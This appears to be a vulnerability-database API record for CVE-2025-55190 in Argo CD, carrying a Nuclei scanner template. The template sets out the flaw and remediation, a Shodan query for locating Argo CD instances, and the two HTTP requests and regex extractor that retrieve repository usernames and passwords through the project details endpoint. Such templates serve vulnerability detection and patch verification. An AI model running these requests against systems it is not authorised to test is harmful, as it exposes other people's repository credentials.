{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2025-55190/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2025-55190/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2025-55190/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2025-55190/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2025-55190/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2025-55190"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2025-55190"
    }
  },
  "enrichments": {
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2025/CVE-2025-55190.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2025-55190\n\ninfo:\n  name: ArgoCD Project API Token Repository Credentials Exposure\n  author: nukunga[seunghyeonJeon]\n  severity: critical\n  description: |\n    Argo CD API tokens with project-level permissions are able to retrieve sensitive repository credentials\n    (usernames, passwords) through the project details API endpoint, even when the token only has standard\n    application management permissions and no explicit access to secrets. This vulnerability affects versions\n    v2.2.0-rc1 and later, including 2.13.0 through 2.13.8, 2.14.0 through 2.14.15, 3.0.0 through 3.0.12,\n    and 3.1.0-rc1 through 3.1.1. Any token with project get permissions is vulnerable, including global permissions.\n    Note: This template requires valid ArgoCD credentials (username/password) to test the vulnerability.\n  impact: |\n    Authenticated attackers with project-level API tokens can retrieve sensitive repository credentials including usernames and passwords without requiring explicit secret access permissions.\n  remediation: |\n    Upgrade ArgoCD to version 2.13.9, 2.14.16, 3.0.13, 3.1.2, or later depending on your version branch that properly restricts repository credential access.\n  reference:\n    - https://github.com/argoproj/argo-cd/security/advisories/GHSA-786q-9hcg-v9ff\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-55190\n    - https://github.com/argoproj/argo-cd/commit/e8f86101f5378662ae6151ce5c3a76e9141900e8\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 9.9\n    cve-id: CVE-2025-55190\n    epss-score: 0.0534\n    epss-percentile: 0.92267\n    cwe-id: CWE-200\n  metadata:\n    verified: true\n    max-request: 2\n    shodan-query: http.title:\"argo cd\"\n  tags: cve,cve2025,argocd,credentials,exposure,gitops,kubernetes,vkev,vuln\n\nvariables:\n  username: \"{{username}}\"\n  password: \"{{password}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /api/v1/session HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n\n    extractors:\n      - type: json\n        name: token\n        part: body\n        internal: true\n        json:\n          - '.token'\n\n  - raw:\n      - |\n        GET /api/v1/projects/default/detailed HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Bearer {{token}}\n        Content-Type: application/json\n\n    matchers-condition: and\n    matchers:\n\n      - type: word\n        part: body\n        words:\n          - '\"repositories\":'\n          - '\"username\":'\n          - '\"password\":'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        name: exposed_credentials\n        part: body\n        group: 1\n        regex:\n          - '\"repositories\":\\[.*?\"username\":\"([^\"]+)\".*?\"password\":\"([^\"]+)\"'\n# digest: 490a004630440220198fb37fe507a8354e8f6486ba35a0f2a42453d16e44bd1182f744c1e44cdb4d0220592d899d787efee33c6a9c84ec451b0e366736b4661b281db02943a5b9c7becb:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2025-55190"
}